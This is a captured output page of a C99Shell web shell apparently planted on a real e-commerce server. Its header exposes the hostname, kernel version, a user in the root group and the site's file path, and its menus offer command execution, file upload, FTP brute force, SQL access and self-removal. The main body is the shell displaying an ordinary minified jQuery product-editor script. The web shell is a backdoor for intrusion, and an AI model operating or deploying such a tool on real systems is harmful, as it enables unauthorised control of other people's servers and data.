!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/public/dist/js/custom/   drwxr-xr-x
Free 25.91 GB of 117.98 GB (21.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     create-product.min.js (25.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"use strict";$(function(){function a(){$(".summernote").summernote("codeview.isActivated")&&$(".summernote").summernote("codeview.deactivate")}$(document).on("blur","#item_name",function(){B($(this).closest(".blockable"));let a={name:$(this).val(),action:"update_basic_info"};$.makeAjaxCall(itemUrl,a,{type:"post",success:b})});const b=(a,b)=>{E(),b.status.message=jsLang("Product name updated."),H(b.status)};$(document).on("click",".add-new-attribute",function(){let a=$("#attribute-list").val();var b=!1;if($(".attr_id").each(function(){if($(this).val()==a)return $(this).closest(".ui-sortable-handle").find(".toggle-btn.inactive-sec").trigger("click"),b=!0,!1}),!b){let b=$(this).closest(".tab-content");B(b),$.makeAjaxCall(itemUrl,{attr_id:a,index:countHelper.attributes,action:"get_attribute_form"},{type:"post",success:c,callbackParam:{blockable:b}})}});const c=(a,b)=>{let c=b.records.form;$(".attribute-item-lists").append(c),H(b.status),a.blockable.unblock(),A(),C(),w()};$(document).on("keyup",".attribute-name",function(){$(this).closest(".ui-sortable-handle").find(".attribute-box-title").text($(this).val())}),$(document).on("click",".save_attributes",function(){let a=d(),b=$(this).closest(".blockable");B(b),$.makeAjaxCall(itemUrl,{data:a,action:"add_new_attribute"},{type:"post",success:e,callbackParam:{blockable:b}})});const d=()=>$(".attribute-parent-box").find("input,select,textarea").serialize(),e=(a,b)=>{a.blockable.unblock(),200===b.status.code?(f({blockable:a.blockable}),H(b.status)):H(b.status)},f=(a={})=>{$.makeAjaxCall(itemUrl,{action:"load_product_variations"},{type:"post",success:k,callbackParam:a})};$(document).on("click",".save_variations",function(){let a=g(),b=$(this).closest(".blockable");B(b),$.makeAjaxCall(itemUrl,{data:a,action:"save_product_variation"},{success:i,type:"post",callbackParam:{blockable:b}})}),$(document).on("click",".save_b2b",function(){let a=h(),b=$(this).closest(".blockable");B(b),$.makeAjaxCall(itemUrl,{data:a,action:"save_product_b_2_b"},{success:i,type:"post",callbackParam:{blockable:b}})});const g=()=>$(".variations-list").find("input,select,textarea").serialize(),h=()=>$(".b2b-prices").find("input,select,textarea").serialize(),i=(a,b)=>{f(),H(b.status)};$(document).on("click",".add-new-variant",function(){let a=$(this).closest(".tab-content");B(a),$.makeAjaxCall(itemUrl,{type:$(".variation-type").val(),action:"add_product_variation",index:countHelper.variations},{type:"post",success:j,callbackParam:{blockable:a}})});const j=(a,b)=>{let c=$(b.records.html);M(c),$(".variation-item-lists").append(c),refreshDatePickers(),H(b.status),C(),A(),N(),a.blockable&&a.blockable.unblock()},k=(a,b)=>{let c=$(b.records.html);M(c),$(".variations-list").html(b.records.html),C(),refreshDatePickers(),E(),N()};$(document).on("submit",".delete_attribute",function(a){a.preventDefault();let b=$(this).closest(".blockable");B(b);let c=$(this).closest(".ui-sortable-handle").find(".attribute-name").val();$.makeAjaxCall(itemUrl,{attr_name:c,action:"delete_attribute"},{type:"post",success:l,callbackParam:{attr:$(this).closest(".ui-sortable-handle"),blockable:b}})}),$(document).on("submit",".delete_variation",function(a){a.preventDefault();let b=$(this).closest(".blockable");B(b);let c=$(this).closest(".ui-sortable-handle").find(".variable_post").val();$.makeAjaxCall(itemUrl,{vi:c,action:"delete_variation"},{type:"post",success:m,callbackParam:{var:$(this).closest(".ui-sortable-handle"),blockable:b}})});const l=(a,b)=>200===b.status.code?void(H(b.status),a.blockable.unblock(),a.attr.remove(),A(),f()):void E(),m=(a,b)=>200===b.status.code?void(H(b.status),a.blockable.unblock(),a.var.remove(),A(),N()):void E();$(document).on("click",".save-permalink",function(){let a=$(".edit-permalink").val(),b=$(this).closest(".blockable");B(b),$.makeAjaxCall(itemUrl,{permalink:a,action:"update_permalink"},{type:"post",success:n,callbackParam:{blockable:b}})});const n=(a,b)=>{$(".edit-permalink").val(b.records.permalink),$(".preview-link").attr("href",b.records.previewUrl),$(".edit-permalink").trigger("updated"),H(b.status),a.blockable.unblock()};$(document).on("change","#category_id",function(){B($(this).closest(".blockable")),$.makeAjaxCall(itemUrl,{category:$(this).val(),action:"update_basic_info"},{type:"post",success:o})});const o=(a,b)=>{E(),b.status.message=jsLang("Category updated."),H(b.status)};$(document).on("click",".update-item-button",function(){B($(".list-container")),a(),p()});const p=()=>{let a=g();$.makeAjaxCall(itemUrl,{data:a,action:"save_product_variation"},{success:q,failed:q,type:"post"})},q=()=>{let a=$(".mini-form-holder").find("input,select,textarea").serialize();$(".ajax-form-data").val(a),$(".ajax-form-action").val("update_basic_info_web"),$("#ajaxReloadForm").trigger("submit")};$(".attribute_sortable").on("sortstop",function(){let a=$(".attribute_sortable").sortable("toArray",{attribute:"data-serial"});a.forEach((a,b)=>{$(`input[name="attribute_position[${a}]"]`).val(b)})}),$(document).on("click",".save-brand-info",function(){B($(this).closest(".blockable")),$.makeAjaxCall(itemUrl,{data:$(this).closest(".mini-form-holder").find("select,input,textarea").serialize(),action:"update_basic_info"},{type:"post"})}),$(document).on("click",".media-store",function(){B($(this).closest(".blockable")),$.makeAjaxCall(itemUrl,{data:$(this).closest(".mini-form-holder").find("input[type=hidden]").serialize(),action:"update_basic_info"},{type:"post",success:r})});const r=(a,b)=>{E(),b.status.message=jsLang("Product media updated."),H(b.status)};$(document).on("change",".has_impact",function(){let a=$(this).data("name").split(",").filter(a=>""!==a.trim()),b=0,c=$(this).is(":checked");a.forEach(a=>{b=$(`.has_impact:checked[data-name=${a}]`).length,1===b&&c?($(this).closest(".impact_parent").find(`.on_impact[data-name=${a}]`).show(),$(this).closest(".impact_parent").find(`.off_impact[data-name=${a}]`).hide()):0===b&&!c&&($(this).closest(".impact_parent").find(`.on_impact[data-name=${a}]`).hide(),$(this).closest(".impact_parent").find(`.off_impact[data-name=${a}]`).show())})}),$(document).on("file-attached",".seo-image",function(a,b){let c=b.data;$(this).closest(".preview-parent").find(".preview-image").html(G(c,$(this).data("name")))}),$(document).on("file-attached",".downloadable-file",function(a,b){let c=b.data[0];$(this).closest(".downloadable-row").find(".downloadable-name").val(c.name),$(this).closest(".downloadable-row").find(".downloadable-url").val(c.url)}),$(document).on("file-attached",".product-image",function(a,b){let c=b.data;$(this).closest(".preview-parent").find(".preview-image").append(G(c,$(this).data("name")))}),$(document).on("file-attached",".video-uploader",function(a,b){let c=b.data;$(this).closest(".preview-parent").find(".preview-video").append(O(c,$(this).data("name")))}),$(document).on("file-attached",".variation-image",function(a,b){$(this).closest(".variation-image-container").html(Q(b.data[0],$(this).data("name")))}),$(document).on("click",".variation-image-remove",function(){$(this).closest(".variation-image-container").html(R($(this).data("name")))}),$(document).on("file-detached",".media-box",function(){$(this).find("input[name=file_id[]]").val()});const s=(a,b)=>{E(),a.blockable.unblock(),b.status.message=jsLang("Product seo updated."),H(b.status)};$(document).on("click",".seo-update",function(){let a=$(this).closest(".blockable"),b=$(this).closest(".mini-form-holder").find("input,select,textarea").serialize();B(a),$.makeAjaxCall(itemUrl,{data:b,action:"update_basic_info"},{type:"post",success:s,callbackParam:{blockable:a}})}),$(document).on("change","input[name=video_input]",function(){"file"==$(this).val()?($(".video-file-upload").closest(".video-uploader").addClass("has-media-manager"),$(".video-file-upload").removeClass("save-url"),$(".video-link-upload").attr("disabled","disabled"),$(".video-label").text(jsLang("Browse"))):($(".video-file-upload").closest(".video-uploader").removeClass("has-media-manager"),$(".video-file-upload").addClass("save-url"),$(".video-label").text(jsLang("Save Url")),$(".video-link-upload").attr("disabled",!1))}),$(document).on("click",".save-url",function(){t()}),$(document).on("keyup",".video-link-upload",function(a){a.preventDefault(),13===a.keyCode&&t()}),$(document).on("submit","#itemForm",function(a){a.preventDefault()});const t=()=>{if("file"!=$("input[name=video_input]:checked").val()){let a=$(".video-link-upload").val();$(".video-urls").append(S(filterXSS(a)))}};$(document).on("click",".remove-url",function(){$(this).closest(".video-url").remove()}),$(document).on("click",".remove-product-image",function(){$(this).closest(".img-box-two").remove()}),$(document).on("click",".add-downloadables",function(){let a=$(this).closest(".section-downloadable").find(".downloadable-row").length,b=JSON.stringify($(this).data("idx")??"");$(this).closest(".section-downloadable").find("tbody").append(T(a,b))}),$(document).on("click",".add-b2b",function(){let a=$(this).closest(".enable_b2b").find(".b2b_row").length,b=JSON.stringify($(this).data("idx")??"");$(this).closest(".enable_b2b").find(".b2b_div").append(U(a,b))}),$(document).on("click",".sec-dlt",function(){$(this).closest(".downloadable-row").remove()}),$(document).on("click",".delete_b2b",function(){$(this).closest(".b2b_row").remove()}),$(document).on("change",".product-type",function(){let a="__",b=$(this).val();"Variable Product"===b?a="not-variable-dom":"Simple Product"===b?a="not-simple-dom":"Grouped Product"===b?a="not-grouped-dom":"External/Affiliate Product"===b&&(a="not-external-dom"),u(a)});const u=a=>{$(".conditional-dom").each(function(){$(this).hasClass(a)?$(this).addClass("d-none"):$(this).removeClass("d-none")}),v(a)},v=a=>{let b=$(`.nav-item.conditional-dom.${a} .active`);1>b.length||$(`.nav-item.conditional-dom`).each(function(){return!!($(this).hasClass(a)||$(this).hasClass("d-none"))||($(this).find(".nav-link").tab("show"),!1)})},w=()=>{$(".product-type").trigger("change")};$(document).on("click","#confirmDeleteSubmitBtn",function(){$(this).closest(".modal-footer").find(".close").trigger("click")}),$("#addAttribute").on("show.bs.modal",function(a){let b=$(a.relatedTarget),c=$(this);c.find(".modal-title").html(b.data("title")),c.find(".modal-body label").html(b.data("message")),c.find(".targetAttrId").val(b.data("id")),c.find(".sectionId").val(b.data("section"))}),$(document).on("click","#confirmAttributeSubmit",function(){let a=$("#addAttribute");$.makeAjaxCall(itemUrl,{attribute_id:a.find(".targetAttrId").val(),value:a.find(".newAttributeValue").val(),action:"add_new_attribute_value"},{callbackParam:{aSection:a.find(".sectionId").val()},success:x,failed:x})});const x=(a,b)=>{if(201==b?.status?.code){let c=$(`#${a.aSection}`).find("select.select2");c.append($("<option>",{value:b.records.attribute.id,text:b.records.attribute.value,selected:"selected"}))}L(),$("#addAttribute").find(".close").trigger("click"),$(".attribute-form").trigger("reset"),H(b.status)};$(document).on("keyup change",".sale_price",function(){let a=+$(this).val(),b=+$(this).closest(".price_div").find(".regular_price").val();isNaN(b)||0==b?($(this).val(""),z($(this).parent(),jsLang("Define a valid regular price."))):isNaN(b)||isNaN(a)||!(b<=a)?y($(this).closest(".price_div")):($(this).val(""),z($(this).parent(),jsLang("Sell price must be less than regular price.")))}),$(document).on("blur change",".max_qty",function(){let a=+$(this).val(),b=+$(this).closest(".b2b_row").find(".min_qty").val();isNaN(b)||0==b?($(this).val(""),z($(this).parent(),jsLang("Define a valid minimum quantity."))):isNaN(b)||isNaN(a)||!(b>=a)?y($(this).closest(".b2b_row")):($(this).val(""),z($(this).parent(),jsLang("Maximum quantity must be greater than minimum quantity.")))}),$(document).on("keyup",".regular_price",function(){N()});const y=(a=null)=>{null==a?$(".err-msg").remove():$(a).find(".err-msg").remove()},z=(a,b)=>{0<$(a).find(".err-msg").length?$(a).find(".err-msg").html(b):$(a).append(`<small class="err-msg text-danger">${b}</small>`)},A=()=>{countHelper.attributes=$(".attribute-parent-box").children().length,countHelper.variations=$(".variation-item-lists").children().length,$(".variation-count").html(countHelper.variations),$(".attribute-count").html(countHelper.attributes)},B=(a,b={})=>{let c=Object.assign({},{message:`<div class="spinner-border text-warning" role="status"><span class="sr-only">Loading...</span></div>`,css:{backgroundColor:"transparent",border:"none"}},b);a.block(c)},C=()=>{$("select.select2").select2({allowClear:!1,placeholder:jsLang("Select an option")}),$("select.select2clearable").select2({allowClear:!0,placeholder:jsLang("Select an option")})};jQuery.extend({makeAjaxCall:function(a,b={},c={}){let{defaults:d,data:e}={defaults:{type:"get",dataType:"json",processData:!1,contentType:"json",success:D,failed:D,callbackParam:!1,formdata:!1},data:{_token:token}};d=Object.assign({},d,c),e=d.formdata?d.formdata:Object.assign({},e,b),$.ajax({url:a,type:d.type,dataType:d.dataType,data:e,success:function(a){$(".spinner-border").remove(),F(a.response),d.success(d.callbackParam,a.response)},error:function(a,b,c){$(".spinner-border").remove(),d.failed(a,b,c)}})}});const D=(a,b)=>{E(),H(b?.status??{})},E=()=>{$(".blockUI").each(function(){$(this).parent().unblock()})},F=a=>{a&&(a.url&&(itemUrl=a.url,$("#ajaxReloadForm").attr("action",a.url)),a.permalink&&($(".edit-permalink").val(a.permalink),$(".preview-link").attr("href",a.previewUrl),$(".edit-permalink").trigger("updated"),$(".permalink-section").removeClass("d-none"),$(".permalink-section").addClass("d-flex")),a.name&&$("#item_name").val(a.name))},G=(a,b)=>{let c="";return a.length?a.forEach(a=>{c+=P(a,b)}):c=P(a,b),c},H=a=>200==a?.code||201==a?.status?I(a?.message??jsLang("Process completed successfully.")):J(a?.message??jsLang("Failed to process the request. Check network log for more information.")),I=a=>{K("alert-success",a)},J=a=>{K("alert-danger",a)},K=(a,b)=>{$(".notification-msg-bar").find(".notification-msg").html(b),$(".notification-msg-bar").removeClass("smoothly-hide"),setTimeout(()=>{$(".notification-msg-bar").addClass("smoothly-hide"),$(".notification-msg-bar").find(".notification-msg").html("")},1500)};$(document).on("click",".has-spinner-loader",function(){$(this).append("<div class=\"spinner-border spinner-border-sm ml-2\" role=\"status\"><span class=\"sr-only\">Loading...</span></div>"),$(this).addClass("disabled-btn")});const L=()=>{$(".has-spinner-loader").removeClass("disabled-btn"),$(".spinner-border").remove()},M=a=>{a.find(".start_date,.end_date").daterangepicker(clearableDateRangePickerConf()).on("apply.daterangepicker",function(){datePickerUpdatedEvent(this)})},N=()=>{let a=0;$(".variations-list").find(".regular_price").each(function(){if(""==$(this).val())return a++,!1}),0<a?$(".no-price-warning").show():$(".no-price-warning").hide()};$(".select-ajax").select2({ajax:{url:itemsAjaxSearch,dataType:"json",delay:250,data:function(a){return{q:a.term,page:a.page}},processResults:function(a){let b=a.data;return{results:b}},cache:!0},placeholder:jsLang("Search for products by name or slug."),minimumInputLength:3}),$(".select-ajax-tags").select2({ajax:{url:tagsAjaxSearch,dataType:"json",delay:250,data:function(a){return{q:a.term,page:a.page}},processResults:function(a){let b=a.data;return{results:b}},cache:!0},placeholder:jsLang("Search tags by name"),minimumInputLength:3,tags:!0}),$("select.select2clearable").select2({allowClear:!0,placeholder:jsLang("Select an option")}),C(),A(),$(".attribute_sortable").sortable({}),$(".variation_sortable").sortable({}),w(),16<$(".customs-permalink").val().length?$(".permalink-msg").html($(".customs-permalink").val().substring(0,16)+"..."):$(".permalink-msg").html($(".customs-permalink").val()),$(".options-add").on("click",function(){$(".permalink-msg").hide(),$(".customs-permalink").removeClass("d-none")}),$(document).on("updated",".customs-permalink",function(){$(".permalink-msg").html($(".customs-permalink").val()).show(),$(".customs-permalink").addClass("d-none"),16<$(".customs-permalink").val().length&&$(".permalink-msg").html($(".customs-permalink").val().substring(0,16)+"...")}),$(".cancel-button").on("click",function(){$(".permalink-msg").show(),$(".customs-permalink").addClass("d-none")}),N();const O=a=>{let b="";return a.forEach(a=>{b+=`<div class="img-box-two video-prev mt-20p">
                        <video controls src="${a.url}">
                            ${jsLang("Sorry, your browser doesn't support embedded videos.")}
                        </video>
                        <input type="hidden" name="meta_video_files[]" value="${a.path}">
                        <svg class="svg-postion cursor-pointer remove-product-image" width="14" height="14" viewBox="0 0 14 14"
                            fill="none" xmlns="http://www.w3.org/2000/svg">
                            <circle cx="7" cy="7" r="7" fill="#FCCA19" />
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="M4.21967 4.21967C4.51256 3.92678 4.98744 3.92678 5.28033 4.21967L9.78033 8.71967C10.0732 9.01256 10.0732 9.48744 9.78033 9.78033C9.48744 10.0732 9.01256 10.0732 8.71967 9.78033L4.21967 5.28033C3.92678 4.98744 3.92678 4.51256 4.21967 4.21967Z"
                                fill="#2C2C2C" />
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="M9.78033 4.21967C9.48744 3.92678 9.01256 3.92678 8.71967 4.21967L4.21967 8.71967C3.92678 9.01256 3.92678 9.48744 4.21967 9.78033C4.51256 10.0732 4.98744 10.0732 5.28033 9.78033L9.78033 5.28033C10.0732 4.98744 10.0732 4.51256 9.78033 4.21967Z"
                                fill="#2C2C2C" />
                        </svg>
                    </div>`}),b},P=(a,b)=>`<div class="img-box-two mt-15p">
                    <img class="fit-boxed" src="${a.url}"
                        alt="${a.name}">
                    <input type="hidden" value="${a.path}" name="${b}">
                    <svg class="svg-postion cursor-pointer remove-product-image" width="14" height="14" viewBox="0 0 14 14"
                        fill="none" xmlns="http://www.w3.org/2000/svg">
                        <circle cx="7" cy="7" r="7" fill="#FCCA19">
                        </circle>
                        <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M4.21967 4.21967C4.51256 3.92678 4.98744 3.92678 5.28033 4.21967L9.78033 8.71967C10.0732 9.01256 10.0732 9.48744 9.78033 9.78033C9.48744 10.0732 9.01256 10.0732 8.71967 9.78033L4.21967 5.28033C3.92678 4.98744 3.92678 4.51256 4.21967 4.21967Z"
                            fill="#2C2C2C"></path>
                        <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M9.78033 4.21967C9.48744 3.92678 9.01256 3.92678 8.71967 4.21967L4.21967 8.71967C3.92678 9.01256 3.92678 9.48744 4.21967 9.78033C4.51256 10.0732 4.98744 10.0732 5.28033 9.78033L9.78033 5.28033C10.0732 4.98744 10.0732 4.51256 9.78033 4.21967Z"
                            fill="#2C2C2C"></path>
                    </svg>
                </div>`,Q=(a,b)=>`<div class="d-flx align-items-center">
                    <div class="position-relative border u-img-box">
                        <input type="hidden" class="variable-image" value="${a.path}" name="${b}">
                        <img class="h-100 w-100 object-fit-contain variation-image-placeholder"
                            src="${a.url}" />
                    </div>
                    <a href="javascript:void(0)" data-name="${b}" data-val="single"
                        class="btn-cancels ml-20p variation-image-remove">
                        ${jsLang("Remove")}
                    </a>
                </div>`,R=a=>`<div class="d-flx align-items-center">
                    <div class="position-relative border u-img-box">
                        <img class="h-100 w-100 object-fit-contain variation-image-placeholder"
                            src="${variationImagePlaceholder}" />
                    </div>
                    <a href="javascript:void(0)" data-name="${a}" data-val="single"
                        class="btn-cancels ml-20p variation-image has-media-manager">
                        ${jsLang("Upload Photo")}
                    </a>
                </div>`,S=a=>`<div class="video-url d-flx mt-n2">
                    <span>Video URL:</span>
                    <a class="m-change ml-2" target="_blank" href="${a}">${a}</a>
                    <input type="hidden" name="meta_video_url[]" value="${a}">
                    <span class="remove-url remove-url d-flex align-items-center ml-2">
                    <svg class="cursor-pointer remove-product-image"
                            width="14" height="14" viewBox="0 0 14 14" fill="none"
                            xmlns="http://www.w3.org/2000/svg">
                            <circle cx="7" cy="7" r="7" fill="#FCCA19"></circle>
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="M4.21967 4.21967C4.51256 3.92678 4.98744 3.92678 5.28033 4.21967L9.78033 8.71967C10.0732 9.01256 10.0732 9.48744 9.78033 9.78033C9.48744 10.0732 9.01256 10.0732 8.71967 9.78033L4.21967 5.28033C3.92678 4.98744 3.92678 4.51256 4.21967 4.21967Z"
                                fill="#2C2C2C"></path>
                            <path fill-rule="evenodd" clip-rule="evenodd"
                                d="M9.78033 4.21967C9.48744 3.92678 9.01256 3.92678 8.71967 4.21967L4.21967 8.71967C3.92678 9.01256 3.92678 9.48744 4.21967 9.78033C4.51256 10.0732 4.98744 10.0732 5.28033 9.78033L9.78033 5.28033C10.0732 4.98744 10.0732 4.51256 9.78033 4.21967Z"
                                fill="#2C2C2C"></path>
                        </svg></span>
                </div>`,T=(a,b="")=>("\"\""===b?b="":b,"<tr draggable=\"false\" id=\"option-value-rowid-2\" class=\"ui-sortable-handle downloadable-row attribute-dlt\"><td colspan=\"2\" class=\"label\"><div class=\"d-flex align-items-center\"><svg class=\"mr-10p\" width=\"16\" height=\"11\" viewBox=\"0 0 16 11\" fill=\"none\" xmlns=\"http://www.w3.org/2000/svg\"> <rect width=\"16\" height=\"1\" fill=\"#898989\"> </rect> <rect y=\"5\" width=\"16\" height=\"1\" fill=\"#898989\"></rect> <rect y=\"10\" width=\"16\" height=\"1\" fill=\"#898989\"></rect> </svg><input type=\"text\" name=\"meta_downloadable_files"+b+"["+a+"][name]\" value=\"\" class=\"form-control downloadable-name\"></div></td><td colspan=\"2\"><input type=\"text\" name=\"meta_downloadable_files"+b+"["+a+"][url]\" class=\"form-control downloadable-url\" value=\"\"></td><td><div class=\"position-relative px-11p downloadable-file\"><a class=\"add-files-button has-media-manager\" data-val=\"single\">"+jsLang("Choose file")+"</a>"+`<svg class="sec-dlt position-absolute top-11p right-n6"
                        width="8" height="8" viewBox="0 0 8 8"
                        fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M0.292893 0.292893C0.683417 -0.0976311 1.31658 -0.0976311 1.70711 0.292893L7.70711 6.29289C8.09763 6.68342 8.09763 7.31658 7.70711 7.70711C7.31658 8.09763 6.68342 8.09763 6.29289 7.70711L0.292893 1.70711C-0.0976311 1.31658 -0.0976311 0.683417 0.292893 0.292893Z"
                            fill="#898989"></path>
                        <path fill-rule="evenodd" clip-rule="evenodd"
                            d="M7.70711 0.292893C7.31658 -0.0976311 6.68342 -0.0976311 6.29289 0.292893L0.292893 6.29289C-0.0976315 6.68342 -0.0976315 7.31658 0.292893 7.70711C0.683417 8.09763 1.31658 8.09763 1.70711 7.70711L7.70711 1.70711C8.09763 1.31658 8.09763 0.683417 7.70711 0.292893Z"
                            fill="#898989"></path>
                    </svg>
                </div>
            </td>
        </tr>
        `),U=(a,b="")=>("\"\""===b?b="":b,`<div class="row b2b_row">
                        <div class="col-md-3 pb-4p">
                            <input type="number" placeholder="0" class="form-control inputFieldDesign min_qty" maxlength="8" name="meta_b2b_data${b}[${a}][min_qty]" value="">
                        </div>
                        <div class="col-md-3 pb-4p">
                            <input type="number" placeholder="0" class="form-control inputFieldDesign max_qty" maxlength="8" name="meta_b2b_data${b}[${a}][max_qty]" value="">
                        </div>
                        <div class="col-md-3 pb-4p">
                            <input type="number" placeholder="0" class="form-control inputFieldDesign" maxlength="8" name="meta_b2b_data${b}[${a}][price]" value="">
                        </div>
                        <div class="col-md-3 pb-4p">
                              <svg class="delete_b2b position-absolute mt-14p ml-3"
                                   width="8" height="8" viewBox="0 0 8 8"
                                   fill="none" xmlns="http://www.w3.org/2000/svg">
                                  <path fill-rule="evenodd" clip-rule="evenodd"
                                        d="M0.292893 0.292893C0.683417 -0.0976311 1.31658 -0.0976311 1.70711 0.292893L7.70711 6.29289C8.09763 6.68342 8.09763 7.31658 7.70711 7.70711C7.31658 8.09763 6.68342 8.09763 6.29289 7.70711L0.292893 1.70711C-0.0976311 1.31658 -0.0976311 0.683417 0.292893 0.292893Z"
                                        fill="#898989"></path>
                                  <path fill-rule="evenodd" clip-rule="evenodd"
                                        d="M7.70711 0.292893C7.31658 -0.0976311 6.68342 -0.0976311 6.29289 0.292893L0.292893 6.29289C-0.0976315 6.68342 -0.0976315 7.31658 0.292893 7.70711C0.683417 8.09763 1.31658 8.09763 1.70711 7.70711L7.70711 1.70711C8.09763 1.31658 8.09763 0.683417 7.70711 0.292893Z"
                                        fill="#898989"></path>
                              </svg>
                          </div>
                    </div>`)});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--